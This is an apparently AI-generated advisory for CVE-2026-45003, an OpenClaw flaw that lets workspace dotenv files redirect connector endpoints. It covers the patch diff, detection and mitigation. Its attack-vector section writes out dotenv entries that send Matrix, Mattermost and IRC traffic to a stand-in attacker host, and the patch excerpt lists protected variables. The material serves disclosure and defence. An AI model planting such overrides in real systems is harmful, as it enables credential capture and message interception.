CVE-2026-45003 Overview
CVE-2026-45003 affects OpenClaw versions before 2026.4.22. The vulnerability allows workspace dotenv files to override connector endpoint hosts for Matrix, Mattermost, IRC, and Synology connectors. Attackers with workspace access can set endpoint variables in dotenv files to redirect runtime traffic to attacker-controlled endpoints. The flaw maps to [CWE-441] (Unintended Proxy or Intermediary, also known as Confused Deputy). OpenClaw lacked an allowlist that excluded connector endpoint variables from workspace-level overrides. The issue was patched in commit 0623079e98abf7202591f1b04a89755eb7ec9272.
Critical Impact
An attacker with write access to a workspace can silently redirect outbound connector traffic to malicious hosts, enabling credential capture and message interception for Matrix, Mattermost, IRC, and Synology integrations.
Affected Products
- OpenClaw (Node.js distribution) versions prior to 2026.4.22
- Matrix, Mattermost, IRC, and Synology connector integrations within OpenClaw
- Workspaces that allow user-supplied dotenv files
Discovery Timeline
- 2026-05-11 - CVE-2026-45003 published to NVD
- 2026-05-13 - Last updated in NVD database
Technical Details for CVE-2026-45003
Vulnerability Analysis
OpenClaw loads environment variables from workspace-scoped dotenv files at runtime. These variables configure connector behavior, including the endpoint hosts used by Matrix, Mattermost, IRC, and Synology connectors. Before version 2026.4.22, the dotenv loader did not restrict which variables a workspace could override. As a result, variables such as MATRIX_HOMESERVER, MATTERMOST_URL, and IRC_HOST could be redefined per workspace, replacing the operator-configured endpoints with attacker-supplied values. The vulnerability is local in nature and requires workspace access, but it bypasses the trust boundary between workspace-level configuration and global connector configuration.
Root Cause
The root cause is missing input filtering in src/infra/dotenv.ts. The dotenv loader merged workspace variables into the process environment without enforcing an allowlist of safe keys. Connector endpoint variables were not present in the protected set, so workspace files could override them. This is a classic confused-deputy pattern where lower-privilege configuration is permitted to influence higher-privilege runtime behavior.
Attack Vector
An attacker with permission to edit a workspace dotenv file adds entries such as MATRIX_HOMESERVER=https://attacker.example, MATTERMOST_URL=https://attacker.example, or IRC_HOST=attacker.example. When OpenClaw next initializes connectors for that workspace, requests carrying authentication tokens and message payloads are sent to the attacker-controlled host instead of the legitimate service. The attacker can harvest credentials, intercept messages, or proxy traffic back to the real service to remain stealthy.
// Patch excerpt from src/infra/dotenv.ts
// fix(dotenv): block connector endpoint workspace overrides (#70240)
"CLAWHUB_URL",
"HTTP_PROXY",
"HTTPS_PROXY",
+ "IRC_HOST",
+ "MATTERMOST_URL",
+ "MATRIX_HOMESERVER",
"MINIMAX_API_HOST",
"NODE_TLS_REJECT_UNAUTHORIZED",
"NO_PROXY",
// Source: https://github.com/openclaw/openclaw/commit/0623079e98abf7202591f1b04a89755eb7ec9272
The patch adds IRC_HOST, MATTERMOST_URL, and MATRIX_HOMESERVER to the list of variables that workspace dotenv files cannot override.
Detection Methods for CVE-2026-45003
Indicators of Compromise
- Workspace .env files containing MATRIX_HOMESERVER, MATTERMOST_URL, IRC_HOST, or Synology endpoint variables that differ from the global configuration.
- Outbound connections from OpenClaw hosts to domains not associated with the organization's chat, IRC, or Synology infrastructure.
- Connector authentication tokens or session cookies observed in network captures destined for unexpected hostnames.
Detection Strategies
- Scan workspace directories for dotenv files and diff their keys against the allowlist defined in src/infra/dotenv.ts after upgrading.
- Audit OpenClaw application logs for connector initialization entries that reference non-default endpoint hosts.
- Compare DNS resolution and TLS Server Name Indication (SNI) values from OpenClaw processes against an approved endpoint list.
Monitoring Recommendations
- Alert when OpenClaw process egress connects to hosts outside an allowlist of sanctioned Matrix, Mattermost, IRC, and Synology domains.
- Track changes to workspace dotenv files using file integrity monitoring and Git history reviews.
- Forward OpenClaw runtime logs to a central log platform and alert on connector endpoint configuration changes.
How to Mitigate CVE-2026-45003
Immediate Actions Required
- Upgrade OpenClaw to version 2026.4.22 or later, which contains commit 0623079e98abf7202591f1b04a89755eb7ec9272.
- Review every workspace dotenv file and remove any MATRIX_HOMESERVER, MATTERMOST_URL, IRC_HOST, or Synology endpoint entries.
- Rotate credentials, API tokens, and bot secrets used by Matrix, Mattermost, IRC, and Synology connectors if workspace files were modified by untrusted users.
Patch Information
The fix is published in the OpenClaw repository as commit 0623079e98abf7202591f1b04a89755eb7ec9272 and is documented in GitHub Security Advisory GHSA-55cf-xx38-4p9p. Additional context is available in the VulnCheck Advisory on OpenClaw. The patch extends the protected-variable allowlist in src/infra/dotenv.ts to block workspace overrides of connector endpoint hosts.
Workarounds
- Restrict write access to workspace directories and dotenv files to trusted administrators only.
- Set connector endpoint variables in the global environment and remove them from workspace-scoped dotenv files.
- Apply outbound network egress filtering so OpenClaw can only reach sanctioned connector endpoints.
# Verify no workspace dotenv overrides connector endpoints
grep -RInE '^(MATRIX_HOMESERVER|MATTERMOST_URL|IRC_HOST)=' /path/to/openclaw/workspaces/
# Upgrade OpenClaw to the patched release
npm install openclaw@2026.4.22
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
